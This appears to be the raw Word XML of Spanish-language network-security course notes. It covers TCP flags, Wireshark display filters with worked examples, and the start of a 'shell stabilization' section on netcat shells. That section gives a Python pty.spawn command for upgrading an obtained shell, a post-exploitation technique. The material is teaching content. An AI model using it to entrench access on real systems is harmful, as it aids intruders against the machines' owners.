                <w:color w:val="ff0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:color w:val="ff0000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">No presente - Este paquete no incluye opciones adicionales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:trHeight w:val="344.264073118522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2">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Tamaño del paquete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240" w:lineRule="auto"/>
              <w:ind w:left="19" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="745556"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="745556"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:highlight w:val="white"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">0 - Indica el tamaño del paquete en bytes, en este caso no contiene datos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">**** Estos son los valores que puede tomar el campo “Flags”:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:tblW w:w="1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900"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="420"/>
            <w:gridCol w:w="900"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>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SYN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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FIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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ACK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>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ind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RESET</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BE">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360" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="792" w:right="0" w:hanging="432"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.d1w76w44l2zk" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una herramienta gráfica y cuyo manejo es mucho más intuitivo que la anterior, pero hay que tener en cuenta que no siempre vamos a tenerla a mano. Es interesante conocer algunos de los filtros que pueden sernos más útiles. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C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color w:val="808080"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filtrado de paquetes</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6"/>
        <w:tblW w:w="8520.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-15.0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2655"/>
        <w:gridCol w:w="5865"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2655"/>
            <w:gridCol w:w="58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bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:shd w:fill="ffffff" w:val="clear"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="720"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Filtro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:color="000000" w:space="0" w:sz="6" w:val="single"/>
              <w:left w:color="000000" w:space="0" w:sz="6" w:val="single"/>
              <w:bottom w:color="000000" w:space="0" w:sz="6" w:val="single"/>
              <w:right w:color="000000" w:space="0" w:sz="6" w:val="single"/>
            </w:tcBorders>
            <w:shd w:fill="auto" w:val="clear"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:shd w:fill="ffffff" w:val="clear"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="720" w:hanging="720"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="1"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Descripción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3">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arp</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4">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ARP.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5">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icmp</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6">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ICMP.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7">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udp</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8">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UDP.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9">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dhcp</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A">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relacionados con DHCP.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B">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ftp</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C">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relacionados con FTP.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D">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ip.src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E">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cuyo origen sea la dirección IP especificada.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CF">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ip.dst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0">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cuyo destino sea la dirección IP especificada.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1">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tcp.srcport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2">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TCP cuyo puerto de origen sea el especificado.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3">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tcp.dstport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4">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TCP cuyo puerto de destino sea el especificado.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5">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udp.srcport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6">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UDP cuyo puerto de origen sea el especificado.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7">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udp.dstport == xxxx</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D8">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UDP cuyo puerto de destino sea el especificado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>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tcp.flags.syn == 1</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cuyo flag SYN sea 1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>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tcp.flags.fin == 1</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240" w:lineRule="auto"/>
              <w:ind w:left="19"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Muestra los paquetes cuyo flag FIN sea 1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="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Para configurar filtros combinados, pueden utilizarse los siguientes operadores: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i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">not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&amp;&amp;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) y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(u </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">or</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F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:color w:val="808080"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Si continuamos con los ejemplos vistos para </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, los comandos a introducir quedarían como sigue: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">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IP cuyo protocolo sea ICMP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">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icmp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">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TCP cuyo puerto de destino sea 80:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">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tcp.dstport == 80</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4">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UDP cuyo puerto de origen sea 53:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">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udp.srcport == 53</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">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IPv4 cuyo host de destino sea 192.168.1.1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">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ip.dst == 192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">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TCP cuyo host de origen sea 192.168.1.1 y cuyo host de destino sea 10.1.1.1:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E9">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(ip.src == 192.168.1.1) &amp;&amp; (ip.dst == 10.1.1.1) &amp;&amp; (tcp)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">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TCP cuyo host de origen sea 192.168.1.1 o cuyo host de destino sea 10.10.10.250:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">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(ip.src == 192.168.1.1) || (ip.dst == 10.10.10.250) &amp;&amp; (tcp)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EC">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TCP cuyo host de origen sea 10.1.1.1, el host de destino sea 192.168.1.1 y el puerto de origen sea 22:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="0" w:line="411.42960000000005"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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ip.src == 10.1.1.1) &amp;&amp; (ip.dst == 192.168.1.1) &amp;&amp; (tcp.srcport == 22)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="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Queremos capturar los paquetes TCP cuyo host de origen sea 192.168.1.1, el host de destino sea 10.10.10.250, y el puerto de destino sea 443, y el protocolo sea HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="19" w:firstLine="548"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:smallCaps w:val="1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ip.src == 192.168.1.1) &amp;&amp; (ip.dst == 10.10.10.250) &amp;&amp; (tcp.dstport == 443) &amp;&amp; (http)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="120" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.kvgrnuzgzsa1" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Estabilización de la shell</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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Una</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell obtenida mediante herramientas como netcat tiene algunas deficiencias: no se puede recorrer el historial con las flechas, no funciona el autocompletado, aparecen caracteres extraños, no se distingue la entrada de la salida, no se muestran mesajes de error de los comandos …</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="1a1a1a"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2525078" cy="958594"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="16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25078" cy="95859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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Se</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pueden mejorar algunas de esas cuestiones utilizando una instrucción de </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python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4">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="1a1a1a"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python -c ‘import pty; pty.spawn(“/bin/bash”)’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:after="120" w:before="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:cs="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="1a1a1a"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="b7b7b7" w:val="clear"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2877975" cy="1429975"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="17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77975" cy="14299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Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pty</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> es una instrucción en Python que importa el módulo </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pty </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
